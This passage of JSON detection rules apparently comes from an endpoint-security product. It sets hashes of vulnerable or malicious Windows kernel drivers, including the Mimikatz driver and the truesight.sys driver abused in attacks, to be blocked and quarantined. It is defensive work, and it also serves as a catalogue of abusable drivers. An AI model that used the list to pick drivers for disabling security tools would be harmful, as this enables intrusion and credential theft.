"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2113e119-a16e-5f6b-b4a7-f50c34a99ed5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816491Z", + "creation_date": "2026-03-23T11:45:30.816493Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816498Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "783a127c470a136b07a41bdaf2d78a8e4e73c3fca1a124d33d5f8653ef887d30", + "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2118f218-c663-5734-a2fd-3d26fc521c1e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820460Z", + "creation_date": "2026-03-23T11:45:30.820462Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820468Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ebe114a72d27b5abf47e17137dbb85f52ca987c8bb80ea709eb3293c9637f73c", + "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "212343ec-985b-5528-b2dc-d836b03015fc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605594Z", + "creation_date": "2026-03-23T11:45:29.605596Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605601Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c18b6993154fa0e24d15726c50e8325d32381020786ce22eb1b71184d95af481", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "21290020-1544-54d2-a09d-016502eae338", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453133Z", + "creation_date": "2026-03-23T11:45:30.453136Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453145Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1c2f1e2b0cc4da128feb73a6b9dd040df8495fefe861d69c9f44778c6ddb9b9b", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "21348137-f6d8-5ef9-8ac9-0021786a1c32", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620900Z", + "creation_date": "2026-03-23T11:45:29.620902Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620907Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "05f052c64d192cf69a462a5ec16dda0d43ca5d0245900c9fcb9201685a2e7748", + 
"comment": "Phoenix Technologies Vulnerable Physmem drivers (aka Agent64.sys) [https://www.loldrivers.io/drivers/5943b267-64f3-40d4-8669-354f23dec122/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2134d7da-132a-56af-a8b2-2a040f4ac486", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824115Z", + "creation_date": "2026-03-23T11:45:30.824117Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824126Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "394a05770de545620828504403f8a746e5cc1f26d4363317c0497e4b0310b5e8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2148fea8-7aa1-5201-9617-28343f8c4743", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", 
+ "last_update": "2026-03-23T11:45:29.608086Z", + "creation_date": "2026-03-23T11:45:29.608088Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608093Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "918d2e68a724b58d37443aea159e70bf8b1b5ebb089c395cad1d62745ecdaa19", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "214e02e9-7fc2-5448-9b0b-c55263ae7f74", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489726Z", + "creation_date": "2026-03-23T11:45:31.489729Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489737Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b355ff97defd226c9b79f92283c940f9d00bfda1b629dc70c761bf044b7ac8c0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2159d869-033a-50c0-9bb7-df80e62a39a3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820911Z", + "creation_date": "2026-03-23T11:45:30.820913Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820919Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d6801e845d380c809d0da8c7a5d3cd2faa382875ae72f5f7af667a34df25fbf7", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2166c90d-2cda-581a-9642-dad07271ef8f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468527Z", + "creation_date": "2026-03-23T11:45:30.468530Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.468539Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "047e4158225af627382c412fa1f870479a238841341bc13e60312269feb14083", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "216d41f7-eac1-55bd-b87c-b9f5f6d6bf88", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970564Z", + "creation_date": "2026-03-23T11:45:29.970566Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970571Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "557d6eb7550b038a3d92832b6218d5e6be72f490958f4ffa87ccd821f8866c3c", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "217915dd-6f83-5c72-9f46-81b8c72200ef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472810Z", + "creation_date": "2026-03-23T11:45:31.472814Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472821Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "197144bb4d00a04d2860594096b3db45e86581bca9beb131fca69227a2761ccb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "217adcd7-950f-5155-be70-a796ef3fc846", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810011Z", + "creation_date": "2026-03-23T11:45:31.810013Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810018Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e5cb8102fdd41687f386e57c7728a07810e620e9117d7394d79d5ad753261ffc", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "21877d01-7486-5db8-ad6c-3f5df81a9099", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458722Z", + "creation_date": "2026-03-23T11:45:30.458725Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.458734Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "058c4fbd3a12f0d7ddfc771067f03dea88cc33dd4b61139edcb0b2d17905f084", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "218924ad-8816-5364-b3e5-7a9ba6cde337", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.160153Z", + "creation_date": "2026-03-23T11:45:31.160155Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160161Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "62acd95fb57656258a9621b72b5a6697f90e18c9941fc840f993d304522c3f42", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "218decdb-7c20-5bc7-9ac4-d8980e603efc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619524Z", + "creation_date": "2026-03-23T11:45:29.619526Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619531Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "38e7a51de1701057088aac05a8d98a7bb447f8204d193a9f77f449c97b00c850", + "comment": "Insyde Software dangerous update tool (aka segwindrvx64.sys) [https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Program%3AWin32%2FVulnInsydeDriver.A&threatid=258247] 
[file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "218e03dd-6e9d-556a-8d4e-8ff14e7180bf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146970Z", + "creation_date": "2026-03-23T11:45:31.146973Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146978Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fcde2218562066972e7794ca362dfef3ad98a8eb03750e0610cd47c2bed6b74c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "218f2ef1-f0a0-5120-93f2-cc088926a6d8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971542Z", + "creation_date": "2026-03-23T11:45:29.971544Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971549Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1997b7217dfddd8fbd4924e86b58fe585ef4bd91c3069d3deeb34ea70eb82d60", + "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2192c2b4-4066-5489-9fdb-518c23fa6525", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620763Z", + "creation_date": "2026-03-23T11:45:29.620764Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620770Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b1334a71cc73b3d0c54f62d8011bec330dfc355a239bf94a121f6e4c86a30a2e", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "219b1808-2fe3-5b76-ac3c-568719d4c284", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458848Z", + "creation_date": "2026-03-23T11:45:30.458851Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.458860Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aa1c07fc6289ddc2182b11e555073e66b7acbfc17c38efb44ecaa19a6aaf722f", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "219d4acc-ee4c-5d64-96f3-d43ac21a4a61", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477549Z", + "creation_date": "2026-03-23T11:45:30.477552Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477561Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b11e109f6b3dbc8aa82cd7da0b7ba93d07d9809ee2a4b21ec014f6a676a53027", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "21a5a513-4811-5537-93a8-b2b9322aa250", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458079Z", + "creation_date": "2026-03-23T11:45:30.458083Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.458092Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f62911334068c9edd44b9c3e8dee8155a0097aa331dd4566a61afa3549f35f65", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "21be4aed-a057-512d-b267-3bfa722e07ba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828618Z", + "creation_date": "2026-03-23T11:45:31.828620Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828626Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "285d8e3f07009af95cdeab7bfc91cdbfbae48663582745a5881cfd7d63168ff1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "21bfdfd2-d7c0-5b7c-8e5e-efd6a6b8c3d1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.478542Z", + "creation_date": "2026-03-23T11:45:30.478545Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.478554Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a2d9f91ede8aed51960ca67318ea337152bb311c03275c0650e4421e6af6b7ee", + "comment": "Vulnerable Kernel Driver (aka vboxdrv.sys) [https://www.loldrivers.io/drivers/2da3a276-9e38-4ee6-903d-d15f7c355e7c/] 
[authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "21c56f4d-ad5e-51ab-80b2-807c0fe08a0e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817905Z", + "creation_date": "2026-03-23T11:45:30.817909Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817917Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 